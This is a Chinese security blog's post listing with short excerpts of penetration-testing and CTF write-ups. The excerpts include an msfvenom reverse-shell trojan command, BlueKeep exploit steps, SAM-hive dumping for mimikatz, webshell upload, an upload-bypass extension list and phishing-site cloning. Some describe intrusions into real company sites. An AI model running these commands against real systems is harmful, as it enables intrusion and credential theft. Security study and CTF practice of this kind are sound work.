- 博客(90)
- 收藏
- 关注
原创 spring-heapdump内存泄露漏洞复现
前景:在渗透某公司时,js 里面找到一个 url,打开url发现是 spring 框架查看网站js 文件,得到一个用户名和密码和一个url密码是加密过的暂时无法解密2.打开url http://xxx.xxx.cn/video-api发现是spring 的框架直接扫描路径 看是否有敏感信息泄露扫描得到一些目录最下面 video-api/heapdump 访问直接下载使用jvisualvm.exe 查找敏感信息(这个工具java8自带)点击文件-》装入选
2022-05-19 15:21:59
4890
原创 记一次实战windows 2008 R2 Datacenter 提权
前景:拿到某个站 getshell 上传马后发现权限低,然后就是漫长的提权过程蚁剑连接到aspx 的马后进入终端先进行信息收集一波,使用命令whoami 可以发现是iis 的权限使用命令 systeminfo 查看操作系统和打了哪些补丁等等,windows 2008 R2 Datacenter只打了一个补丁可以使用蚁剑插件进行一个反弹shell,使用As-Exploits (挺好用的插件)进入后可以先识别一下杀软,运气很好这台服务器没有安装杀软进行反弹shell(首先得在自
2022-03-03 08:56:00
2291
2
原创 记一次sql注入艰难上传马过程
先说一下我的思路,得到一个sql注入点,sqlmap 进行os-shell ,然后想上传webshell,首先进行cs 上线,发现无法上线cs,原因是目标系统windwos 2003 没有powershell,换一个思路,先找到web路径,然后上传webshell。找到web路径之后,发现路径带中文,os-shell写入webshell 的时候就会提示没有这个路径,然后进行一个手注发现上传成功发现注入点,使用sqlmap进行os-shell尝试上线cs,为了更好的后续操作(失败)执行powersh
2022-01-26 16:39:02
5216
原创 cve-2019-0708--(远程桌面服务远程执行代码漏洞)拿下win7权限
准备kali linux 攻击机 ip:192.168.38.128win7 靶机 ip:192.168.38.129kali 进入msfsearch cve-2019-0708选择 1 exploit/windows/rdp/cve_2019_0708_bluekeep_rceuse 1 # 选择1这个模块show targets # 查看适用机型 这里一般设置第一个show options查看需要设置的参数set rhosts 192.168.38.12
2022-01-01 16:58:18
2906
2
原创 读取 Windows Hash 密码两种方式
管理员执行cmdreg save HKLM\SYSTEM C:\sys.hivreg save HKLM\SAM C:\sam.hiv导出注册表文件下载mimikatzhttps://github.com/gentilkiwi/mimikatz/releases配置环境变量我们在c盘目录下,命令行直接执行mimikatz.exelsadump::sam /sam:sam.hiv /system:sys.hiv...
2021-12-10 10:27:52
1191
原创 ctf.show-web-1000题
信息收集爆破命令执行文件包含php特性文件上传sql注入反序列化java代码审计phpCVEXSSnodejsjwtSSRFSSTIXXE区块链安全黑盒测试
2021-12-07 09:54:01
6051
原创 social-engineer-toolkit搭建-网站克隆钓鱼
准备:我这边用的是ubuntu20social-engineer-toolkit下载地址下载 git clone https://github.com/trustedsec/social-engineer-toolkit.git安装python 模块 pip install requirements.txt使用运行 ./setoolkit进入选择 11) Social-Engineering Attacks # 社会工程学攻击2) Pe
2021-11-30 18:04:25
2219
2
原创 文件上传后缀名字典
文件上传后缀名字典phpphp2php3php4php5pHppHp2pHp3pHp4pHp5htmlhtmphtmlphtHtmlHtmpHtmlaspaspxasaasaxashxasmxceraSpaSpxaSaaSaxaScxaShxaSmxcErjspjspajspxjswjxvjspfjtmlJSpjSpxjSpajSwjSvjSpfjHtmlasp/test.jpgasp;.jpgcer/test
2021-11-21 14:54:25
2255
原创 Cobalt Strike(cs) 联动 msf
真实渗透场景靶机:win2008 ip:218.77.102.xvps(cs 服务端 和 安装了msf):centos7 ip:45.76.151.x本地(cs 客户端,连接cs ):本地已经连接cs 并且已经上线、我们只需要连接到msf添加监听器点击add 添加payload 设置为Foreign HTTP,ip 为vps 主机,设置端口 点击seav3. 添加成功后如图4. vps 打开msf,use exploit/multi/handlerset pay
2021-11-18 23:49:59
3265
原创 msf渗透命令和后渗透攻击
msf 常用命令1. msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=本机ip LPROT=4444 EXITFUNC=thread -b '\x00' -f exe-only -o 文件名.exe 生成木马2. msfconsole 3. use exploit/multi/handler 利用模块4. show targets 查看这
2021-11-17 10:19:46
2128
原创 CTF——AWD模式小总结
本文以bugku平台awd比赛来写awd 比赛平台一、防御(比赛开始有30分钟防御时间)比赛开始得到一个 靶机,如下信息ssh 用户名和密码,还有虚拟ip然后我们ssh 连接进行防御,这里我推荐使用Xshell配合Xftp使用,打开xshell 新建一个连接,写入相应信息填入用户名还有密码,然后点击连接2. 进入之后我们直接点击,xftp按钮(目的: 需要连接xftp下载文件)连接成功后如下进入/var/www将html文件下载下来 (目的是扫描是否存在后门,还有代码审计
2021-11-04 22:51:15
18544
19
原创 MySQL make_set()使用----红日代码审计day1
make_set(bits,str1,str2,…)返回一个设定值(含子字符串分隔字符串","字符),在设置位的相应位的字符串。str1对应于位0,str2到第1位,依此类推。在str1,str1有NULL值,…那么不添加到结果。结果取二进制反码前景: 发现个SQL注入,过滤掉了很多东西但是没有过滤报错注入的关键函数,只过滤了coucat所以我们直接把concat() 替换为 make_set()先学习一下make_set()select make_set(1,'a','b','c');1
2021-10-27 14:49:41
415
4
原创 buuctf-misc-喵喵喵
打开题目一张猫的图片2.用stegsolve 打开,发现red、Green、Blue 上面有东西2. 发现png 头,导出为png3. 导出之后图片无法打开因为前面多了一些东西,我们把这多余的删除掉保存4. 打开发现就半张二维码5. 继续修改高度6. 打开得到完整的二维码扫描,得到一个链接 https://pan.baidu.com/s/1pLT2J4f7. 下载链接文件得到一个 flag.rar,解压得到 flag.txt使用NtfsStreamsEditor,查看(.
2021-10-25 23:23:35
1175
2
原创 2021年江西省大学生信息安全技术大赛-线上赛-MISC-STAGA
STAGA-1cat.png打开一张猫的图片用StegSolve 打开,发现red、Green、Blue 0通道都有东西选择0 通道 Prevoew 执行一下发现 base64 编码解码下flag{724b4b8e8f1e5523de67c94bb19c2f52}STAGA-2国际歌.mp3 音频文件听了一下发现后面一部分没有声音,猜测有东西,分离一下foremost 分离一下得到一张图片StegSolve 打开往左点了几下,flag就出来了flag{y0u_are_sos..
2021-10-24 22:16:03
1198
5
原创 记一次sql注入漏洞挖掘
拿到一个 url,使用sqlmap 扫描一下发现盲注2. 然后拿表名3. 拿每个表的列名其他两个表就不上了直接放所有列4.猜测 后台用户名密码在admin 表,feedback 表是用户信息表跑admin 表所有内容,拿到 用户名密码,密码有点敏感打了码**第二部**1.拿到用户名密码之后,我们扫描一下后台路径拿到后台登录简单看了一下没发现上传点,后续再看...
2021-10-12 23:29:03
367
原创 bugku-web-xxx二手交易市场
打开题目先注册账号登录头像那里文件上传抓包我们先上传一个普通的图片,抓包可以看见返回了目录然后上传一只base64 加密的马我们把base64, 后面替换成 php 的一句话木马base64 加密这边发现个小细节,一句话木马;后面 不能有空格,否则马会报错,应该是最后面要是 = 号(我也不太懂)上传马浏览器访问木马蚁剑连接小结:一句话木马;有空格base64 加密后最后一位就是+ 号,这样的马连接不上,这里挺有意思的学到了学到了...
2021-10-08 23:27:18
2434
原创 redis-未授权访问缺陷漏洞
使用一个漏洞扫描器得到一个ip,存在redis未授权访问漏洞使用kali 把redis 安装一下redis-cli -h ip 测试连接info 查看敏感信息暂时先水到这里下次继续水
2021-09-14 09:39:43
135
原创 linux-centos7-重置密码(rd.break 方法)
启动系统,在如图这个界面按 “e”进去之后键盘上下键移动到开头是 “linux16” 的地方,使用键盘上的“end”或“ctrl+e",移动到最后,并且加上rd.break加上rd.break 之后,使用“ctrl+x”,进入如下界面,使用命令 mount -o remount,rw /sysroot/,重新挂载,赋予读写权限更改根目录 chroot sysroot修改密码 echo 123456|passwd –stdin root 修改root密码为123456或者直接 passwd .
2021-09-10 15:17:47
5936
原创 墨者学院_在线靶场——身份认证失效漏洞实战
实验目标:了解越权漏洞熟练使用burp打开靶机我们先看一下题目打开网站,有个测试用户我们登入测试用户,这边有个会员名我们使用burp 抓包,去修改会员名,,一般用户的会员名都差不多,我们先只修改后面两位试试。设置值爆破完之后发现已经爆出其他用户账号,虽然已经爆出账号,但是我们要怎么判断哪个账号是马春生的呢????我们直接按f12 点击马春生头像,发现会员账号 20128880316直接去查找这个账号得到用户名和密码,密码cm
2021-09-07 23:42:17
643
原创 cobaltstrike (cs 使用)初使用
一、CS简介(以下Cobaltstrike简称CS)CobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大
2021-09-06 23:33:58
1093
原创 ctf.show-编辑器配置不当
题目地址打开题目用初恋扫描一下,editor打开 editor点击插入文件点击文件空间进入目录可以查看目录有啥东西最终目录 var/www/html/nothinghere/fl000g.txt,访问拿到flag
2021-08-16 00:15:57
603
原创 buuctf-misc-[SWPU2019]伟大的侦探
打开文章,zip文件加密 txt 文件可以打开,某个编码010 editor 使用EBCDIC 编码,得到密码 wllm_is_the_best_team!打开文件18 张图片,福尔摩斯小人密码flag{iloveholmesandwllm}
2021-07-29 10:25:48
1425
原创 buuctf-misc-[WUSTCTF2020]find_me
1.下载题目,一张图片,右键属性拿到一串。。。⡇⡓⡄⡖⠂⠀⠂⠀⡋⡉⠔⠀⠔⡅⡯⡖⠔⠁⠔⡞⠔⡔⠔⡯⡽⠔⡕⠔⡕⠔⡕⠔⡕⠔⡕⡍=2. 有点点印象,脑子不太好使,直接百度第一个字符就ok盲文盲文解密wctf2020{y$0$u_f$1$n$d$_M$e$e$e$e$e}...
2021-07-28 23:48:47
1118
原创 buuctf-misc-sqltest
下载题目,wireshark 分析,过滤http包,发现都是sql注入的我们直接导出http 包,这样方便看一些这里开始就是他在爆flag 的时候红圈在试第一个字符,等一下试了个100,返回字节848,这个是小了,因为他后面在加大。后面200 发现大了,直到试到101 返回848 发现还是小。这时候他试了个102,返回了个780 所以第一个字符是102,102对应的ascii码是f然后就是第二个一直这样推下去,第二个是108 ascii 码对应 lflag{47edb8..
2021-07-28 23:29:40
970
原创 buuctf-misc-[HBNIS2018]来题中等的吧
下载下来一张图片,一看就是莫斯解密flag{alphalab}… 题目来题中等的我还以为啥
2021-07-28 21:46:10
540
原创 buuctf-misc-[GXYCTF2019]gakki
下载文件,是一张妹纸图片使用foremost,分离拿到一个rar 文件,一般没提示都是暴力破解密码8864解压…然后就直接不会了看大佬文章这是要字频统计,大量无特征、无规律字符。先上大佬的脚本alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+- =\\{\\}[]"strings = open('./flag.txt').read()r..
2021-07-28 17:56:04
932
原创 buuctf-misc-谁赢了比赛?
下载题目一张图片,放到 010 Editor应该是有东西,我们分解一下,一个rar 文件发现这个文件是加密的有个txt 可以看但是没什么用暴力破解 密码 1020解压出来一张gif 图片,拿到分离了一下没东西,使用stegsolve点击 save 保存为png 图片在 使用stegsolve 打开往左点一下6. flagflag{shanxiajingwu_won_the_game}...
2021-07-28 16:45:53
738
原创 buuctf-misc-[SWPU2019]我有一只马里奥
一个exe 文件,运行生成了一个txt文件 提示ntfsntfs 流 ,打开所在目录cmd, notepad .\1.txt:flag.txt
2021-07-28 16:09:05
650
1
原创 buuctf-misc-[ACTF新生赛2020]outguess
下载题目发现,两个文件 zip 有密码核心价值观编码3. 得到密码abc,使用工具outguesskali 下 apt-get install outguess 安装工具outguess -k ‘abc’ -r mmm.jpg flag.txtACTF{gue33_Gu3Ss!2020}
2021-07-28 14:41:20
701
原创 buuctf-misc-[BJDCTF2020]纳尼
打开文件发现无法打开,使用010 Editor 看一下,发现他没有gif的文件头我们添加一个 gif 头修改为 47 49 46 38保存打开图片,gif图片文字一直切换gif分解一共4段拼起来 base64 解密CTF{wang_bao_qiang_is_sad}...
2021-07-28 10:44:27
1117
原创 buuctf-misc-穿越时空的思念
打开题目一个mp3格式文件,打开听一下明显有摩斯密码声音使用Audacity 打开一个一个 写出来flag{f029bd6f551139eedeb8e45a175b0786}
2021-07-28 09:33:50
486
原创 buuctf-misc-[BJDCTF2020]鸡你太美
解压打开发现了两张gif图片发现有一张打不开,先把另一张分解一下gif分解啥都没有那就看一下副本那张,丢到 010 Editor发现没有gif 文件头插入字节0 开始 4个修改成 47 49 46 38 gif的文件头保存打开拿到flagflag{zhi_yin_you_are_beautiful}...
2021-07-27 22:58:13
1588
原创 buuctf-misc-[BJDCTF2020]一叶障目
打开题目,看着图片就挺奇怪的使用 010 Editor,提示CRC 匹配错误,一般只需要修改宽高使用网上py脚本#coding=utf-8import zlibimport struct#读文件file = '1.png' #注意,1.png图片要和脚本在同一个文件夹下哦~fr = open(file,'rb').read()data = bytearray(fr[12:29])crc32key = eval(str(fr[29:33]).replace('\\x','').r.
2021-07-27 21:24:45
843
原创 buuctf-misc-[GXYCTF2019]佛系青年
下载题目解压发现里面文件有个加密的压缩包放到winhex 发现 是个伪加密解压与佛论禅:http://www.keyfc.net/bbs/tools/tudoucode.aspx
2021-07-23 22:29:37
862
原创 buuctf-web-[MRCTF2020]套娃
打开题目,查看源代码$query = $_SERVER['QUERY_STRING']; # 查询(query)的字符串(URL 中第一个问号 ? 之后的内容)。 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); # substr_count 计算出现的次数,这里计算$query,出现_的次数%5f 也是_ 这里不能等于0.
2021-07-23 17:05:04
267
1
原创 buuctf-misc-被偷走的文件
打开文件盗走了文件,直接过滤http 发现没数据,那就过滤 一下ftp 有了有个flag.rar,记得ftp 有个ftp-data 是ftp 的数据通道,我们过滤一下试试追踪流设置为原始数据然后保存解压发现密码,去包里面找没找到,直接最最常见4位密码爆破5790解压出来拿到flagflag{6fe99a5d03fb01f833ec3caa80358fa3}...
2021-07-22 21:18:02
1231
原创 buuctf-misc-[BJDCTF2020]认真你就输了
下载题目,解压下来 10.xls,打开发现乱码,还有显示flag.txt丢到winhex ,发现是个zip 文件,后缀改一下解压直接搜flag.txtflag{M9eVfi2Pcs#}
2021-07-22 17:47:44
767
原创 buuctf-web-[BSidesCF 2019]Futurella
打开题目发现这些东西复制一下粘贴答案就出来了flag{e0760857-f263-4904-a2c9-6413d837e83c}
2021-07-22 16:01:27
287
原创 buuctf-misc-菜刀666
打开直接过滤 post 请求,发现一处可疑点右键追踪http 流发现两处z1&z2,有东西我们直接输出一下结果,6666.jpg 一张图片下面的应该就是16 进制转图片了a = "16进制"import binasciiout=open('2.jpg','wb')out.write(binascii.unhexlify(s))out.close()以为这个是flag 结果不是继续看包追踪流9,是个加密的文件解密一下,发现一个zip文件,我们.
2021-07-21 16:17:05
1474
原创 buuctf-web-[CISCN2019 华东南赛区]Web11
打开题目, Smarty 猜测应该是模板注入,注入点应该是X-Forwarded-For传入X-Forwarded-For验证是否有漏洞使用命令找到flag查看flag 发现没回显查看源代码拿到flagflag{77f8d94b-c660-47dc-b751-2b749b09143b}...
2021-07-21 09:37:18
211
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人